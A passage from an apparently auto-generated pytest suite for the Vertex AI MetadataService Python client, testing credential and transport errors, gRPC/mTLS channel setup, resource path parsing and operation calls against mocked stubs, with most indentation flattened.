response = await client.query_artifact_lineage_subgraph(
artifact="artifact_value",
)
# Establish that the underlying call was made with the expected
# request object values.
        assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = "artifact_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.query_artifact_lineage_subgraph(
metadata_service.QueryArtifactLineageSubgraphRequest(),
artifact="artifact_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options=options,
transport=transport,
)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = MetadataServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.MetadataServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
@pytest.mark.parametrize(
"transport_name",
[
"grpc",
],
)
def test_transport_kind(transport_name):
transport = MetadataServiceClient.get_transport_class(transport_name)(
credentials=ga_credentials.AnonymousCredentials(),
)
assert transport.kind == transport_name
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.MetadataServiceGrpcTransport,
)
def test_metadata_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.MetadataServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_metadata_service_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.MetadataServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"create_metadata_store",
"get_metadata_store",
"list_metadata_stores",
"delete_metadata_store",
"create_artifact",
"get_artifact",
"list_artifacts",
"update_artifact",
"delete_artifact",
"purge_artifacts",
"create_context",
"get_context",
"list_contexts",
"update_context",
"delete_context",
"purge_contexts",
"add_context_artifacts_and_executions",
"add_context_children",
"query_context_lineage_subgraph",
"create_execution",
"get_execution",
"list_executions",
"update_execution",
"delete_execution",
"purge_executions",
"add_execution_events",
"query_execution_inputs_and_outputs",
"create_metadata_schema",
"get_metadata_schema",
"list_metadata_schemas",
"query_artifact_lineage_subgraph",
"set_iam_policy",
"get_iam_policy",
"test_iam_permissions",
"get_location",
"list_locations",
"get_operation",
"wait_operation",
"cancel_operation",
"delete_operation",
"list_operations",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
# Catch all for all remaining methods and properties
remainder = [
"kind",
]
for r in remainder:
with pytest.raises(NotImplementedError):
getattr(transport, r)()
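# The concrete gRPC and gRPC AsyncIO transports exercised below override each
# method on this abstract surface with a real stub.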
def test_metadata_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MetadataServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_metadata_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MetadataServiceTransport()
adc.assert_called_once()
def test_metadata_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
MetadataServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.MetadataServiceGrpcTransport, grpc_helpers),
(transports.MetadataServiceGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_metadata_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"aiplatform.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=["1", "2"],
default_host="aiplatform.googleapis.com",
ssl_credentials=None,
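            # -1 means "no limit"; gRPC's default receive cap is 4 MB.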
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_grpc_transport_client_cert_source_for_mtls(transport_class):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
    # Check that, if ssl_channel_credentials is not provided,
    # client_cert_source_for_mtls is used instead.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
@pytest.mark.parametrize(
"transport_name",
[
"grpc",
"grpc_asyncio",
],
)
def test_metadata_service_host_no_port(transport_name):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="aiplatform.googleapis.com"
),
transport=transport_name,
)
assert client.transport._host == ("aiplatform.googleapis.com:443")
@pytest.mark.parametrize(
"transport_name",
[
"grpc",
"grpc_asyncio",
],
)
def test_metadata_service_host_with_port(transport_name):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="aiplatform.googleapis.com:8000"
),
transport=transport_name,
)
assert client.transport._host == ("aiplatform.googleapis.com:8000")
def test_metadata_service_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.MetadataServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
def test_metadata_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.MetadataServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_transport_channel_mtls_with_client_cert_source(
transport_class,
):
with mock.patch(
"grpc.ssl_channel_credentials", autospec=True
) as grpc_ssl_channel_cred:
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_metadata_service_transport_channel_mtls_with_adc(transport_class):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(
transport_class, "create_channel"
) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_metadata_service_grpc_lro_client():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
transport = client.transport
    # Ensure that we have an api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsClient,
)
    # Ensure that subsequent calls to the property return the exact same object.
assert transport.operations_client is transport.operations_client
def test_metadata_service_grpc_lro_async_client():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
transport = client.transport
    # Ensure that we have an api-core operations client.
assert isinstance(
transport.operations_client,
operations_v1.OperationsAsyncClient,
)
    # Ensure that subsequent calls to the property return the exact same object.
assert transport.operations_client is transport.operations_client
def test_artifact_path():
project = "squid"
location = "clam"
metadata_store = "whelk"
artifact = "octopus"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/artifacts/{artifact}".format(
project=project,
location=location,
metadata_store=metadata_store,
artifact=artifact,
)
actual = MetadataServiceClient.artifact_path(
project, location, metadata_store, artifact
)
assert expected == actual
def test_parse_artifact_path():
expected = {
"project": "oyster",
"location": "nudibranch",
"metadata_store": "cuttlefish",
"artifact": "mussel",
}
path = MetadataServiceClient.artifact_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_artifact_path(path)
assert expected == actual
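# A minimal sketch of the format/parse symmetry the path tests exercise; the
# literal values are arbitrary (helper is illustrative, not collected).
def _example_artifact_path_roundtrip():
    path = MetadataServiceClient.artifact_path("p", "l", "ms", "a")
    assert MetadataServiceClient.parse_artifact_path(path) == {
        "project": "p",
        "location": "l",
        "metadata_store": "ms",
        "artifact": "a",
    }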
def test_context_path():
project = "winkle"
location = "nautilus"
metadata_store = "scallop"
context = "abalone"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/contexts/{context}".format(
project=project,
location=location,
metadata_store=metadata_store,
context=context,
)
actual = MetadataServiceClient.context_path(
project, location, metadata_store, context
)
assert expected == actual
def test_parse_context_path():
expected = {
"project": "squid",
"location": "clam",
"metadata_store": "whelk",
"context": "octopus",
}
path = MetadataServiceClient.context_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_context_path(path)
assert expected == actual
def test_execution_path():
project = "oyster"
location = "nudibranch"
metadata_store = "cuttlefish"
execution = "mussel"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/executions/{execution}".format(
project=project,
location=location,
metadata_store=metadata_store,
execution=execution,
)
actual = MetadataServiceClient.execution_path(
project, location, metadata_store, execution
)
assert expected == actual
def test_parse_execution_path():
expected = {
"project": "winkle",
"location": "nautilus",
"metadata_store": "scallop",
"execution": "abalone",
}
path = MetadataServiceClient.execution_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_execution_path(path)
assert expected == actual
def test_metadata_schema_path():
project = "squid"
location = "clam"
metadata_store = "whelk"
metadata_schema = "octopus"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}/metadataSchemas/{metadata_schema}".format(
project=project,
location=location,
metadata_store=metadata_store,
metadata_schema=metadata_schema,
)
actual = MetadataServiceClient.metadata_schema_path(
project, location, metadata_store, metadata_schema
)
assert expected == actual
def test_parse_metadata_schema_path():
expected = {
"project": "oyster",
"location": "nudibranch",
"metadata_store": "cuttlefish",
"metadata_schema": "mussel",
}
path = MetadataServiceClient.metadata_schema_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_metadata_schema_path(path)
assert expected == actual
def test_metadata_store_path():
project = "winkle"
location = "nautilus"
metadata_store = "scallop"
expected = "projects/{project}/locations/{location}/metadataStores/{metadata_store}".format(
project=project,
location=location,
metadata_store=metadata_store,
)
actual = MetadataServiceClient.metadata_store_path(
project, location, metadata_store
)
assert expected == actual
def test_parse_metadata_store_path():
expected = {
"project": "abalone",
"location": "squid",
"metadata_store": "clam",
}
path = MetadataServiceClient.metadata_store_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_metadata_store_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "whelk"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = MetadataServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "octopus",
}
path = MetadataServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "oyster"
expected = "folders/{folder}".format(
folder=folder,
)
actual = MetadataServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "nudibranch",
}
path = MetadataServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "cuttlefish"
expected = "organizations/{organization}".format(
organization=organization,
)
actual = MetadataServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "mussel",
}
path = MetadataServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "winkle"
expected = "projects/{project}".format(
project=project,
)
actual = MetadataServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "nautilus",
}
path = MetadataServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "scallop"
location = "abalone"
expected = "projects/{project}/locations/{location}".format(
project=project,
location=location,
)
actual = MetadataServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "squid",
"location": "clam",
}
path = MetadataServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = MetadataServiceClient.parse_common_location_path(path)
assert expected == actual
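# The mollusc-themed literals in the path tests above are arbitrary
# placeholders; only the format/parse round trip matters.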
def test_client_with_default_client_info():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.MetadataServiceTransport, "_prep_wrapped_messages"
) as prep:
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.MetadataServiceTransport, "_prep_wrapped_messages"
) as prep:
transport_class = MetadataServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc_asyncio",
)
with mock.patch.object(
type(getattr(client.transport, "grpc_channel")), "close"
) as close:
async with client:
close.assert_not_called()
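        # Exiting the async context manager closes the channel exactly once.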
close.assert_called_once()
def test_delete_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.DeleteOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_operation_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.DeleteOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_delete_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.DeleteOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
call.return_value = None
client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.DeleteOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_delete_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_delete_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_cancel_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.CancelOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_cancel_operation_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.CancelOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_cancel_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.CancelOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
call.return_value = None
client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_cancel_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.CancelOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.cancel_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_cancel_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.cancel_operation(
request={
"name": "locations",
}
)
call.assert_called()
@pytest.mark.asyncio
async def test_cancel_operation_from_dict_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.cancel_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.cancel_operation(
request={
"name": "locations",
}
)
call.assert_called()
def test_wait_operation(transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.WaitOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation()
response = client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
@pytest.mark.asyncio
async def test_wait_operation_async(transport: str = "grpc_asyncio"):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = operations_pb2.WaitOperationRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
response = await client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, operations_pb2.Operation)
def test_wait_operation_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.WaitOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
call.return_value = operations_pb2.Operation()
client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_wait_operation_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = operations_pb2.WaitOperationRequest()
request.name = "locations"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.wait_operation), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation()
)
await client.wait_operation(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=locations",
) in kw["metadata"]
def test_wait_operation_from_dict():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
